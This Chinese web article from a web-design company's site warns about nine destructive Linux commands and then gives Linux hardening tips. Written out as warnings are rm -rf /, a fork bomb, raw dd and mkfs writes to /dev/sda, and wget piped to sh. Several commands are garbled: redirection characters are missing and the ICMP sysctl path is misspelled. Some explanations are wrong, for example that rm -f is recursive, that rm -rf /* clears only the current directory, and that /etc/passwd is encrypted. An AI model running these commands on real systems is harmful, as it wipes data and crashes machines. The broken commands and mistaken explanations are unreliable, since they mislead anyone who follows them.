這9個(gè)“非常危險(xiǎn)”的Linux命令一定要記住!
創(chuàng)新互聯(lián)長期為超過千家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為競秀企業(yè)提供專業(yè)的網(wǎng)站制作、成都做網(wǎng)站,競秀網(wǎng)站改版等技術(shù)服務(wù)。擁有十余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
1、rm-rf命令
rm-rf命令是刪除文件夾及其內(nèi)容最快的一種方式,僅僅一丁點(diǎn)的敲錯(cuò)或者無知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。
rm命令在Linux下通常用來刪除文件
rm-f命令遞歸的刪除文件夾,甚至是空的文件夾
rm-f命令能不經(jīng)過詢問直接刪除只讀文件
rm-rf/:強(qiáng)制刪除根目錄下所有東西
rm-rf/*:強(qiáng)制刪除當(dāng)前目錄的所有文件
rm-rf.:強(qiáng)制刪除當(dāng)前文件夾及其子文件
溫馨提示:當(dāng)你要執(zhí)行rm -rf命令時(shí),一定要留心,可以在“.bashrc”文件對(duì)“rm”命令創(chuàng)建rm
-i的別名,來預(yù)防用‘rm’命令刪除文件時(shí)的事故。
2、:(){:|:};:命令
這就是一個(gè)fork炸彈的實(shí)例。具體操作是通過定義一個(gè)名為':'的函數(shù),它會(huì)調(diào)用自己兩次,一次在前臺(tái)另一次運(yùn)行在后臺(tái)。它會(huì)反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。
3、命令 /dev/sda
上列命令會(huì)將某個(gè)'命令'的輸出寫到塊設(shè)備/dev/sda中。該操作會(huì)將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù),從而導(dǎo)致整個(gè)塊設(shè)備的數(shù)據(jù)丟失。
4、mv文件夾/dev/null
這個(gè)命令會(huì)移動(dòng)某個(gè)'文件夾'到/dev/null。在Linux中/dev/null或null設(shè)備是一個(gè)特殊的文件,所有寫入它的數(shù)據(jù)都會(huì)被清除,然后返回寫操作成功。
5、wget -O- | sh
上面這個(gè)命令會(huì)從一個(gè)惡意源下載一個(gè)腳本并執(zhí)行。Wget命令會(huì)下載這個(gè)腳本,而sh會(huì)執(zhí)行下載下來的腳本。
溫馨提示:你應(yīng)該時(shí)刻注意你下載包或者腳本的源。只能使用那些從可信任的源中下載腳本/程序。
6、mkfs.ext3 /dev/sda
上列命令會(huì)格式化設(shè)備'sda',你無疑知道在執(zhí)行上列命令后你的塊設(shè)備會(huì)被格式化,嶄新的。沒有任何數(shù)據(jù),直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。
7、 file
上面命令常用來清空文件內(nèi)容,如果用上列執(zhí)行時(shí)輸入錯(cuò)誤或無知的輸入類似“ xt.conf” 的命令會(huì)覆蓋配置文件或其他任何的系統(tǒng)配置文件。
8、^foo^bar
這個(gè)命令用來編輯先前運(yùn)行的命令而無需要打整個(gè)命令。但當(dāng)用foobar命令時(shí)如果你沒有徹底檢查改變?cè)济畹娘L(fēng)險(xiǎn),這可能導(dǎo)致真正的麻煩。
9、dd if=/dev/random of=/dev/sda
上面這個(gè)命令會(huì)向塊設(shè)備sda寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù)。當(dāng)然,你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。
Linux常用的命令可以分為以下幾類:安裝和登錄命令、文件處理命令、系統(tǒng)管理相關(guān)命令、網(wǎng)絡(luò)操作命令、系統(tǒng)安全相關(guān)命令、其它命令。
安裝和登錄命令:login、shutdown、halt、reboot、install、mount、umount、chsh、exit、last。
文件處理命令:file、mkdir、grep、dd、find、mv、ls、diff、cat、ln。
系統(tǒng)管理相關(guān)命令:df、top、free、quota、at、lp、adduser、groupadd、kill、crontab。
網(wǎng)絡(luò)操作命令:ifconfig、ip、ping、netstat、telnet、ftp、route、rlogin、rcp、finger、mail、 nslookup。
系統(tǒng)安全相關(guān)命令:passwd、su、umask、chgrp、chmod、chown、chattr、sudo ps、who。
其它命令:tar、unzip、gunzip、unarj、mtools、man、unendcode、uudecode。
Linux簡介
Linux,全稱GNU/Linux,是一套免費(fèi)使用和自由傳播的類Unix操作系統(tǒng),是一個(gè)基于POSIX的多用戶、多任務(wù)、支持多線程和多CPU的操作系統(tǒng)。伴隨著互聯(lián)網(wǎng)的發(fā)展,Linux得到了來自全世界軟件愛好者、組織、公司的支持。
它除了在服務(wù)器方面保持著強(qiáng)勁的發(fā)展勢(shì)頭以外,在個(gè)人電腦、嵌入式系統(tǒng)上都有著長足的進(jìn)步。使用者不僅可以直觀地獲取該操作系統(tǒng)的實(shí)現(xiàn)機(jī)制,而且可以根據(jù)自身的需要來修改完善Linux,使其最大化地適應(yīng)用戶的需要。
Linux不僅系統(tǒng)性能穩(wěn)定,而且是開源軟件。其核心防火墻組件性能高效、配置簡單,保證了系統(tǒng)的安全。在很多企業(yè)網(wǎng)絡(luò)中,為了追求速度和安全,Linux不僅僅是被網(wǎng)絡(luò)運(yùn)維人員當(dāng)作服務(wù)器使用,甚至當(dāng)作網(wǎng)絡(luò)防火墻,這是Linux的一大亮點(diǎn)。
但由于該操作系統(tǒng)是一個(gè)多用戶操作系統(tǒng),黑客們?yōu)榱嗽诠糁须[藏自己,往往會(huì)選擇 Linux作為首先攻擊的對(duì)象。那么,作為一名Linux用戶,我們?cè)撊绾瓮ㄟ^合理的方法來防范Linux的安全呢?下面筆者搜集和整理了一些防范 Linux安全的幾則措施,現(xiàn)在把它們貢獻(xiàn)出來,懇請(qǐng)各位網(wǎng)友能不斷補(bǔ)充和完善。 1、禁止使用Ping命令Ping命令是計(jì)算機(jī)之間進(jìn)行相互檢測線路完好的一個(gè)應(yīng)用程序,計(jì)算機(jī)間交流數(shù)據(jù)的傳輸沒有 經(jīng)過任何的加密處理,因此我們?cè)谟胮ing命令來檢測某一個(gè)服務(wù)器時(shí),可能在因特網(wǎng)上存在某個(gè)非法分子,通過專門的黑客程序把在網(wǎng)絡(luò)線路上傳輸?shù)男畔⒅型?竊取,并利用偷盜過來的信息對(duì)指定的服務(wù)器或者系統(tǒng)進(jìn)行攻擊,為此我們有必要在Linux系統(tǒng)中禁止使用Linux命令。在Linux里,如果要想使 ping沒反應(yīng)也就是用來忽略icmp包,因此我們可以在Linux的命令行中輸入如下命令: echo 1 /proc/sys/net/ipv4/icmp_echo_igore_all 如果想恢復(fù)使用ping命令,就可以輸入 echo 0 /proc/sys/net/ipv4/icmp_echo_igore_all2、注意對(duì)系統(tǒng)及時(shí)備份為了防止系統(tǒng)在使用的過程中發(fā)生以外情況而難以正常運(yùn)行,我們應(yīng)該對(duì)Linux完好的系統(tǒng)進(jìn) 行備份,最好是在一完成Linux系統(tǒng)的安裝任務(wù)后就對(duì)整個(gè)系統(tǒng)進(jìn)行備份,以后可以根據(jù)這個(gè)備份來驗(yàn)證系統(tǒng)的完整性,這樣就可以發(fā)現(xiàn)系統(tǒng)文件是否被非法修 改過。如果發(fā)生系統(tǒng)文件已經(jīng)被破壞的情況,也可以使用系統(tǒng)備份來恢復(fù)到正常的狀態(tài)。備份信息時(shí),我們可以把完好的系統(tǒng)信息備份在CD-ROM光盤上,以后 可以定期將系統(tǒng)與光盤內(nèi)容進(jìn)行比較以驗(yàn)證系統(tǒng)的完整性是否遭到破壞。如果對(duì)安全級(jí)別的要求特別高,那么可以將光盤設(shè)置為可啟動(dòng)的并且將驗(yàn)證工作作為系統(tǒng)啟 動(dòng)過程的一部分。這樣只要可以通過光盤啟動(dòng),就說明系統(tǒng)尚未被破壞過。 3、改進(jìn)登錄服務(wù)器將系統(tǒng)的登錄服務(wù)器移到一個(gè)單獨(dú)的機(jī)器中會(huì)增加系統(tǒng)的安全級(jí)別,使用一個(gè)更安全的登錄服務(wù)器 來取代Linux自身的登錄工具也可以進(jìn)一步提高安全。在大的Linux網(wǎng)絡(luò)中,最好使用一個(gè)單獨(dú)的登錄服務(wù)器用于syslog服務(wù)。它必須是一個(gè)能夠滿 足所有系統(tǒng)登錄需求并且擁有足夠的磁盤空間的服務(wù)器系統(tǒng),在這個(gè)系統(tǒng)上應(yīng)該沒有其它的服務(wù)運(yùn)行。更安全的登錄服務(wù)器會(huì)大大削弱入侵者透過登錄系統(tǒng)竄改日志 文件的能力。 4、取消Root命令歷史記錄在Linux下,系統(tǒng)會(huì)自動(dòng)記錄用戶輸入過的命令,而root用戶發(fā)出的命令往往具有敏感的 信息,為了保證安全性,一般應(yīng)該不記錄或者少記錄root的命令歷史記錄。為了設(shè)置系統(tǒng)不記錄每個(gè)人執(zhí)行過的命令,我們可以在Linux的命令行下,首先 用cd命令進(jìn)入到/etc命令,然后用編輯命令來打開該目錄下面的profile文件,并在其中輸入如下內(nèi)容: HISTFILESIZE=0
HISTSIZE=0當(dāng)然,我們也可以直接在命令行中輸入如下命令: ln -s /dev/null ~/.bash_history5、為關(guān)鍵分區(qū)建立只讀屬性Linux的文件系統(tǒng)可以分成幾個(gè)主要的分區(qū),每個(gè)分區(qū)分別進(jìn)行不同的配置和安裝,一般情況 下至少要建立/、/usr/local、/var和/home等分區(qū)。/usr可以安裝成只讀并且可以被認(rèn)為是不可修改的。如果/usr中有任何文件發(fā)生 了改變,那么系統(tǒng)將立即發(fā)出安全報(bào)警。當(dāng)然這不包括用戶自己改變/usr中的內(nèi)容。/lib、/boot和/sbin的安裝和設(shè)置也一樣。在安裝時(shí)應(yīng)該盡 量將它們?cè)O(shè)置為只讀,并且對(duì)它們的文件、目錄和屬性進(jìn)行的任何修改都會(huì)導(dǎo)致系統(tǒng)報(bào)警。 當(dāng)然將所有主要的分區(qū)都設(shè)置為只讀是不可能的,有的分區(qū)如/var等,其自身的性質(zhì)就決定了不能將它們?cè)O(shè)置為只讀,但應(yīng)該不允許它具有執(zhí)行權(quán)限。 6、殺掉攻擊者的所有進(jìn)程假設(shè)我們從系統(tǒng)的日志文件中發(fā)現(xiàn)了一個(gè)用戶從我們未知的主機(jī)登錄,而且我們確定該用戶在這臺(tái) 主機(jī)上沒有相應(yīng)的帳號(hào),這表明此時(shí)我們正在受到攻擊。為了保證系統(tǒng)的安全被進(jìn)一步破壞,我們應(yīng)該馬上鎖住指定的帳號(hào),如果攻擊者已經(jīng)登錄到指定的系統(tǒng),我 們應(yīng)該馬上斷開主機(jī)與網(wǎng)絡(luò)的物理連接。如有可能,我們還要進(jìn)一步查看此用戶的歷史記錄,再仔細(xì)查看一下其他用戶是否也已經(jīng)被假冒,攻擊者是否擁有有限權(quán) 限;最后應(yīng)該殺掉此用戶的所有進(jìn)程,并把此主機(jī)的IP地址掩碼加入到文件hosts.deny中。 7、改進(jìn)系統(tǒng)內(nèi)部安全機(jī)制我們可以通過改進(jìn)Linux操作系統(tǒng)的內(nèi)部功能來防止緩沖區(qū)溢出,從而達(dá)到增強(qiáng)Linux系 統(tǒng)內(nèi)部安全機(jī)制的目的,大大提高了整個(gè)系統(tǒng)的安全性。但緩沖區(qū)溢出實(shí)施起來是相當(dāng)困難的,因?yàn)槿肭终弑仨毮軌蚺袛酀撛诘木彌_區(qū)溢出何時(shí)會(huì)出現(xiàn)以及它在內(nèi)存 中的什么位置出現(xiàn)。緩沖區(qū)溢出預(yù)防起來也十分困難,系統(tǒng)管理員必須完全去掉緩沖區(qū)溢出存在的條件才能防止這種方式的攻擊。正因?yàn)槿绱?,許多人甚至包括 Linux Torvalds本人也認(rèn)為這個(gè)安全Linux補(bǔ)丁十分重要,因?yàn)樗乐沽怂惺褂镁彌_區(qū)溢出的攻擊。但是需要引起注意的是,這些補(bǔ)丁也會(huì)導(dǎo)致對(duì)執(zhí)行棧的 某些程序和庫的依賴問題,這些問題也給系統(tǒng)管理員帶來的新的挑戰(zhàn)。 8、對(duì)系統(tǒng)進(jìn)行跟蹤記錄為了能密切地監(jiān)視黑客的攻擊活動(dòng),我們應(yīng)該啟動(dòng)日志文件,來記錄系統(tǒng)的運(yùn)行情況,當(dāng)黑客在攻 擊系統(tǒng)時(shí),它的蛛絲馬跡都會(huì)被記錄在日志文件中的,因此有許多黑客在開始攻擊系統(tǒng)時(shí),往往首先通過修改系統(tǒng)的日志文件,來隱藏自己的行蹤,為此我們必須限 制對(duì)/var/log文件的訪問,禁止一般權(quán)限的用戶去查看日志文件。當(dāng)然,系統(tǒng)中內(nèi)置的日志管理程序功能可能不是太強(qiáng),我們應(yīng)該采用專門的日志程序,來 觀察那些可疑的多次連接嘗試。另外,我們還要小心保護(hù)好具有根權(quán)限的密碼和用戶,因?yàn)楹诳鸵坏┲懒诉@些具有根權(quán)限的帳號(hào)后,他們就可以修改日志文件來隱 藏其蹤跡了。 9、使用專用程序來防范安全有時(shí),我們通過人工的方法來監(jiān)視系統(tǒng)的安全比較麻煩,或者是不周密,因此我們還可以通過專業(yè) 程序來防范系統(tǒng)的安全,目前最典型的方法為設(shè)置陷井和設(shè)置蜜罐兩種方法。所謂陷井就是激活時(shí)能夠觸發(fā)報(bào)警事件的軟件,而蜜罐(honey pot)程序是指設(shè)計(jì)來引誘有入侵企圖者觸發(fā)專門的報(bào)警的陷井程序。通過設(shè)置陷井和蜜罐程序,一旦出現(xiàn)入侵事件系統(tǒng)可以很快發(fā)出報(bào)警。在許多大的網(wǎng)絡(luò)中, 一般都設(shè)計(jì)有專門的陷井程序。陷井程序一般分為兩種:一種是只發(fā)現(xiàn)入侵者而不對(duì)其采取報(bào)復(fù)行動(dòng),另一種是同時(shí)采取報(bào)復(fù)行動(dòng)。 10、將入侵消滅在萌芽狀態(tài)入侵者進(jìn)行攻擊之前最常做的一件事情就是端號(hào)掃瞄,如果能夠及時(shí)發(fā)現(xiàn)和阻止入侵者的端號(hào)掃瞄 行為,那么可以大大減少入侵事件的發(fā)生率。反應(yīng)系統(tǒng)可以是一個(gè)簡單的狀態(tài)檢查包過濾器,也可以是一個(gè)復(fù)雜的入侵檢測系統(tǒng)或可配置的防火墻。我們可以采用諸 如Abacus Port Sentry這樣專業(yè)的工具,來監(jiān)視網(wǎng)絡(luò)接口并且與防火墻交互操作,最終達(dá)到關(guān)閉端口掃瞄攻擊的目的。當(dāng)發(fā)生正在進(jìn)行的端口掃瞄時(shí),Abacus Sentry可以迅速阻止它繼續(xù)執(zhí)行。但是如果配置不當(dāng),它也可能允許敵意的外部者在你的系統(tǒng)中安裝拒絕服務(wù)攻擊。正確地使用這個(gè)軟件將能夠有效地防止對(duì) 端號(hào)大量的并行掃瞄并且阻止所有這樣的入侵者。 11、嚴(yán)格管理好口令前面我們也曾經(jīng)說到過,黑客一旦獲取具有根權(quán)限的帳號(hào)時(shí),就可以對(duì)系統(tǒng)進(jìn)行任意的破壞和攻 擊,因此我們必須保護(hù)好系統(tǒng)的操作口令。通常用戶的口令是保存在文件/etc/passwd文件中的,盡管/etc/passwd是一個(gè)經(jīng)過加密的文件, 但黑客們可以通過許多專用的搜索方法來查找口令,如果我們的口令選擇不當(dāng),就很容易被黑客搜索到。因此,我們一定要選擇一個(gè)確保不容易被搜索的口令。另外,我們最好能安裝一個(gè)口令過濾工具,并借用該工具來幫助自己檢查設(shè)置的口令是否耐得住攻擊。
分享名稱:linux系統(tǒng)安全性命令 linux系統(tǒng)的安全性
當(dāng)前網(wǎng)址:http://jinyejixie.com/article0/dopshoo.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制開發(fā)、標(biāo)簽優(yōu)化、手機(jī)網(wǎng)站建設(shè)、網(wǎng)站內(nèi)鏈、靜態(tài)網(wǎng)站、網(wǎng)站收錄
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)